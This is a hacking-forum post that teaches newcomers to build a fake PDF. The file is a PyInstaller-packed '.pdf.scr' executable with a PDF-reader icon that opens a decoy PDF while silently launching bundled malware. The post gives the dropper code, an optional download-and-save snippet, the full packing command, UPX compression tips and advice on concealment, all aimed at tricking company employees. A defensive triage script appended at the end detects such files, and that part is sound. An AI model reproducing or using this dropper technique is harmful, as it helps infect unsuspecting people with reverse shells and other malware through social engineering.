Malware In a PDF file using Python. | General Hacking | Crax


Malware In a PDF file using Python.


Posted by 0O1 (Member, joined Nov 29, 2023)
I created this tutorial because I remember when the YouTube channel LTT (Linus Tech Tips) got hacked after an employee opened a fake PDF file; it's so strange that a guy who supposedly likes high tech and has good computer science skills can just fall into this trap. Same for the Twitter hack of 2020 by a teenager: just simple phishing. I understood at that moment that I had underestimated the power of social engineering and that we can really hack big things with...

INTRO:

Ooohh, PDFs and documents. Maybe the best way to deliver malware: it's simple, everyone can open one, the format is well known and used by every company. In the past there were exploits for specific PDF readers such as Adobe Acrobat Reader (for example CVE-2009-0658); those are all outdated now, and so are .doc macros. More recently there was the Follina RCE (CVE-2022-30190), patched in June 2022 but still exploitable on machines that never got the patch, and other exploits that get patched really fast. Even I searched for many ways to deliver malware: by a backdoor, a document, even a picture :pepeclap:. Nowadays, without a good 0-day, it's hard to get people with these old exploits, but there is one thing that can't be outdated: our brain. Yes, social engineering. In this tutorial we won't use any exploit, but make a simple yet realistic pdf.scr.

PT1:

First of all, what is a ".pdf.scr"? .scr is simply the extension of Windows screensavers. It was meant for video and animation to be used as a screensaver, but an .scr is just a normal executable with a different extension, so in fact it works with any exe. As for ".pdf", it is only part of the file name: only the last dot counts. For example, "catgirls.txt.docx.pdf" is obviously a PDF file. This trick is called extension spoofing.
But you may ask, what's the point? Well, Windows with default settings ("Hide extensions for known file types") hides known extensions such as ".exe", so you could simply name a file catgirls.pdf.exe; since Windows knows .exe it hides that extension and only shows catgirls.pdf :wat . On mouse hover, though, the tooltip reveals the real type (Application, or Screen saver for .scr, but most people don't know what an .scr file is). That's the problem: we are human, not devices, and this is social engineering. How to make it more realistic? We can simply give the file the PDF reader's icon, and most (stupid?) people will double click, and the malware will execute. One problem is that we don't know which PDF reader the target uses, so we can't put the exact icon. Most Windows 10 users just keep the built-in Microsoft Edge PDF reader, but people who always open PDFs with a specific reader and know its icon well can be a problem....
Now imagine a scenario where you deliver this kind of malware to a company but don't want them to know they got hacked (because for the moment the PDF does not seem to open, since there is only the malware: a naive user will think the PDF is broken, others will realize they got hacked). We can simply make the malware drop / open a real PDF file! That's exactly what we will do in this tutorial: a pdf.scr file with a PDF icon that opens a real PDF.
So create your own test PDF, and let's get into it.

PT2:

Since this tutorial is for newbies and I want to keep it simple and friendly, we will use Python.
First of all we need the malware itself. I won't write one from scratch for this tutorial; even during my tests I didn't use a whole malware, just a simple C# reverse shell, since we want it to be realistic.

Code: import os
import sys
import subprocess

# Find the folder our bundled files live in. When packed with PyInstaller --onefile,
# the files are extracted at start-up into %TEMP%\_MEI<random digits> and that path
# is exposed as sys._MEIPASS; when run as a plain script, fall back to the script's dir.
script_dir = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))
malware = os.path.join(script_dir, 'malware.exe')       # must match the name passed to --add-data (a download variant is shown below)
pdf = os.path.join(script_dir, 'partnership2023.pdf')   # same for the decoy PDF: use the exact name
os.system(pdf)                          # open the PDF with the default handler; errors out if the path is wrong
subprocess.Popen(malware, shell=True)   # launch the payload without blocking the rest of the program



This is a really basic implementation. If you want the program to download the payload and then execute it, you can add these lines before the execution; the easiest way is urllib:

Code: import urllib.request
malwareurl = "https://github.com/idk/malware.exe"
downloadpath = "Updater.exe"
urllib.request.urlretrieve(malwareurl, downloadpath)  # fetches the URL straight into a local file; urllib is simply magic


Now we have our simple working code, and we can use py2exe or PyInstaller. I personally like auto-py-to-exe, which is just a UI for PyInstaller: every PyInstaller option is there, it's simple and fast :smart:. You can install and run it with:

Code: pip install auto-py-to-exe && auto-py-to-exe

Since it has a UI, I won't explain further how to pack it into an exe; it's really simple, and every option can be set from there (see the next part for the "-i" icon argument).
The most important option is maybe --add-data: in the "additional files" part you put your malware exe and the PDF file with the exact names you set in the Python file (during execution you will find these files directly in the _MEI folder).
Anyway, here is the PyInstaller command I got:

Code: pyinstaller --noconfirm --onefile --windowed --icon "C:/Users/censored/censored/pdf.ico" --name "partnership2023.pdf" --upx-dir "C:/Users/censored/censored/UPX/" --clean --add-data "C:/Users/censored/Desktop/project/PDF_skid/partnership2023.pdf;." --add-data "C:/Users/censored/Desktop/project/PDF_skid/malware.exe;." "C:/Users/censored/Desktop/project/PDF_skid/script.py"

Use UPX to make the final exe smaller. In a real-life scenario I would make a C# program that downloads and executes the malware, under 10 MB with UPX plus:

Code: /p:EnableCompressionInSingleFile=true /p:PublishTrimmed=true

to make sure it's as small as possible. Keep in mind the Python code is only for testing purposes.

PyInstaller gives the option to choose the ico file, and we need THAT ONE PDF READER ICON. I didn't find the "official Microsoft Edge PDF reader ico" on the internet, so I just give the one I extracted myself from the Edge app: https://gofile.io/d/ZNa0Xt
An .ico can contain several images at different resolutions so it renders well at every size; this one does it perfectly.
You may understand better with a picture:
[Image: resolution-changes.png]

As you can see, on the left is a normal ico with a single resolution; the second one is the official one, which keeps the icon readable even at small sizes by making the "PDF" lettering bigger.

Once you have downloaded it and added the ico path to your PyInstaller command, just click "CONVERT .PY TO .EXE", wait approximately 2 min, open the output folder, rename the file to .scr, and we're done...

Now you might notice one issue: when we open the exe, if the PDF reader is Microsoft Edge we clearly see the path of the PDF, a somewhat suspicious path (the _MEI folder), because it's not where we opened the PDF from.
To avoid this, the idea would be to copy the PDF file into the actual exe dir, make the exe hide itself and finally open the PDF. You want the code? Well, I won't give it, and it still has some bugs. It's your turn to figure it out!
Anyway, we got a fake PDF (an .scr file) that opens a real PDF; that's already nice! There are other ways, such as .lnk files, which are basically the same idea. This way you can in fact spoof any extension and have it open a real file, for example .docx, .xls, .txt, .png and .jpg. The thing is that some programs have icons that changed a lot over time, like Microsoft Word, and remember that you don't know what software your target uses.
Keep in mind I put a lot of effort even into a basic tutorial like this, so please comment and tell / ask / react.

Reply if there can be any improvements :pepejuice:.
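As an added defensive counterpart to the post (example code, not the author's): the checks a mail gateway or a triage script can run against exactly the artefact built above. It reproduces the Explorer display-name rule the lure relies on (only the last extension is ever hidden, so "x.pdf.scr" shows as "x.pdf" while a genuine "x.pdf" shows as "x"), flags document names with an executable last extension, compares the claimed type with the file's magic bytes, and looks for the PyInstaller cookie and UPX section names this build chain leaves behind. The extension sets stand in for the registry's registered file types, the finding labels are this example's own, and the sample files are constructed byte strings, not real malware.

```python
"""Triage checks for the disguised-executable lure built in the post.

Added defensive example, not code from the post: it never opens or runs a
file, it only inspects a name and its bytes. The sample files at the bottom
are constructed inline (not real malware), the extension sets are a stand-in
for the registry's registered types, and the finding labels are our own.
"""

# Types Windows runs directly on double-click.
EXECUTABLE_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".lnk",
                  ".js", ".vbs", ".hta", ".msi"}
# Types a lure pretends to be.
DOCUMENT_EXT = {".pdf", ".docx", ".doc", ".xls", ".xlsx", ".txt", ".png", ".jpg"}
KNOWN_EXT = EXECUTABLE_EXT | DOCUMENT_EXT
# Registered with NeverShowExt: Explorer hides these even when the
# "hide known extensions" setting is off.
ALWAYS_HIDDEN = {".lnk", ".pif"}

# Public byte signatures.
PE_MAGIC = b"MZ"
PDF_MAGIC = b"%PDF-"
# Shell link header: size 0x4C then the CLSID 00021401-0000-0000-C000-000000000046.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
# PyInstaller stores its bundled archive in the PE overlay, tagged with this cookie.
PYINSTALLER_COOKIE = b"MEI\x0c\x0b\x0a\x0b\x0e"
# UPX renames the packed sections UPX0/UPX1.
UPX_SECTION = b"UPX0"


def split_extensions(name):
    """All dot-suffixes of a file name, lowercased: 'a.pdf.scr' -> ['.pdf', '.scr']."""
    parts = name.lower().split(".")
    return ["." + p for p in parts[1:]]


def explorer_display_name(name, hide_known_extensions=True):
    """What the Explorer file list shows for `name` (default: hide known types).

    Only the last extension is ever hidden, which is why 'x.pdf.scr' is
    displayed as 'x.pdf' while a genuine 'x.pdf' is displayed as 'x'.
    """
    exts = split_extensions(name)
    if not exts:
        return name
    last = exts[-1]
    if last in ALWAYS_HIDDEN or (hide_known_extensions and last in KNOWN_EXT):
        return name[:-len(last)]
    return name


def triage(name, data):
    """Return the list of findings for a file name and its bytes.

    The first KB plus the tail of the file is enough in practice; the
    PyInstaller cookie sits at the end of the file.
    """
    findings = []
    exts = split_extensions(name)
    real_ext = exts[-1] if exts else ""

    # Only the last dot counts: a document-looking name with an executable type.
    if real_ext in EXECUTABLE_EXT and any(e in DOCUMENT_EXT for e in exts[:-1]):
        findings.append("double-extension")

    # Content versus claimed type.
    if data.startswith(PE_MAGIC) and real_ext not in EXECUTABLE_EXT:
        findings.append("pe-with-document-extension")
    if data.startswith(LNK_MAGIC) and real_ext != ".lnk":
        findings.append("lnk-with-wrong-extension")
    if real_ext == ".pdf" and not data.startswith(PDF_MAGIC):
        findings.append("pdf-extension-without-pdf-header")

    # Build-chain fingerprints of the post's packaging (PyInstaller, UPX).
    if data.startswith(PE_MAGIC):
        if PYINSTALLER_COOKIE in data:
            findings.append("pyinstaller-bundle")
        if UPX_SECTION in data:
            findings.append("upx-packed")
    return findings


# Constructed samples: a fake PE carrying both packer markers, a minimal
# PDF header, and a bare shell-link header. None of these is a real file.
FAKE_PE = (PE_MAGIC + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 40
           + b".text\x00\x00\x00" + UPX_SECTION + b"\x00" * 4
           + b"\x00" * 64 + PYINSTALLER_COOKIE + b"\x00" * 24)
FAKE_PDF = PDF_MAGIC + b"1.7\n1 0 obj\n<< /Type /Catalog >>\nendobj\n%%EOF\n"
FAKE_LNK = LNK_MAGIC + b"\x00" * 56

SAMPLES = {
    "partnership2023.pdf.scr": FAKE_PE,   # the artefact built in the post
    "partnership2023.pdf": FAKE_PDF,      # the decoy it opens
    "invoice.pdf.lnk": FAKE_LNK,          # the .lnk variant mentioned at the end
    "report.pdf": FAKE_PE,                # a PE renamed to a pure document name
}

if __name__ == "__main__":
    for fname, blob in SAMPLES.items():
        shown = explorer_display_name(fname)
        print(f"{fname:26} shown as {shown:22} -> {triage(fname, blob)}")
```

Run it as a script to see the four samples side by side; the useful signal for a gateway is that the spoofed file is the only one whose displayed name still ends in ".pdf", and that a PE with a document extension is suspicious regardless of how many dots the name has.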
